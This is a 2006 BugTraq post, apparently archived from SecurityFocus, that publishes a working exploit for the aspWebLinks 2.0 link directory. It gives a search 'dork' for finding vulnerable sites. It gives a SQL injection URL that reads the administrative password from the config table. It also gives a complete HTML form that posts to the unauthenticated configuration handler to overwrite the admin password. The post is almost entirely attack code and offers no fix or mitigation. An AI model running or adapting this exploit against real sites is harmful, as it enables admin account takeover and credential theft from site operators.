BugTraq
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit Jun 02 2006 07:15AM
ajannhwt hotmail com
<!--

# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection

# Author : ajann

# Dork : aspWebLinks 2.0

SQL INJECTION:

http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2
0select+0,administrativepassword,0,0,0,0,0,0,0+from+config

-->

<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>

<form method='POST' action='links.asp?action=modifyconfigprocess'><input

type='hidden' name='txtConfigID' value='1'><input type='hidden'

name='txtSkinName' value='default'><table border='0' width='100%'

cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative

Password:</b></font></td><td width='70%'><input type='text'

name='txtAdministrativePassword' size='43'

value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days

New:</b></font></td><td width='70%'><input type='text'

name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'

align='right' valign='top'><font face="Tahoma" size="1"

color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input

type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td

width='30%' align='right' valign='top'><font face="Tahoma" size="1"

color="black"><b>Links Per Page:</b></font></td><td width='70%'><input

type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td

width='30%' align='right' valign='top'><font face="Tahoma" size="1"

color="black"><b>Category Header:</b></font></td><td width='70%'><input

type='text' name='txtCategoryHeader' size='43' value='<b>Select A

Category:</b>'></td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Category

Columns:</b></font></td><td width='70%'><input type='text'

name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'

align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub

Category Header:</b></font></td><td width='70%'><input type='text'

name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick

or ADD your link:'></td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category

Description:</b></font></td><td width='70%'><input type='radio' value='YES'

name='txtShowCatDescription' checked >YES<input type='radio' value='NO'

name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on

home page:</b></font></td><td width='70%'><input type='radio' value='YES'

name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'

name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New

items on home page:</b></font></td><td width='70%'><input type='text'

name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'

align='right' valign='top'><font face="Tahoma" size="1"

color="black"><b>Show Whats Hot on home page:</b></font></td><td

width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked

>YES<input type='radio' value='NO' name='txtShowWhatsHot'

>NO</td></tr><tr><td width='30%' align='right' valign='top'><font

face="Tahoma" size="1" color="black"><b>Require approval for link and review

additions:</b></font></td><td width='70%'><input type='radio' value='YES'

name='txtNeedApproval' checked >YES<input type='radio' value='NO'

name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot

items on home page:</b></font></td><td width='70%'><input type='text'

name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'

align='right' valign='top'><font face="Tahoma" size="1"

color="black"><b>Whats New Header:</b></font></td><td width='70%'><input

type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats

New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font

face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td

width='70%'><input type='text' name='txtWhatsHotHeader' size='43'

value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links

By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option

selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date

Added</option><option value='HITS'>Number of

Visits</option></td></tr><tr><td width='30%' align='right'

valign='top'><font face="Tahoma" size="1"

color="black"><b></b></font></td><td width='70%'><input type='submit'

value='Update Configuration' name='B1'></td></tr></table></form>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus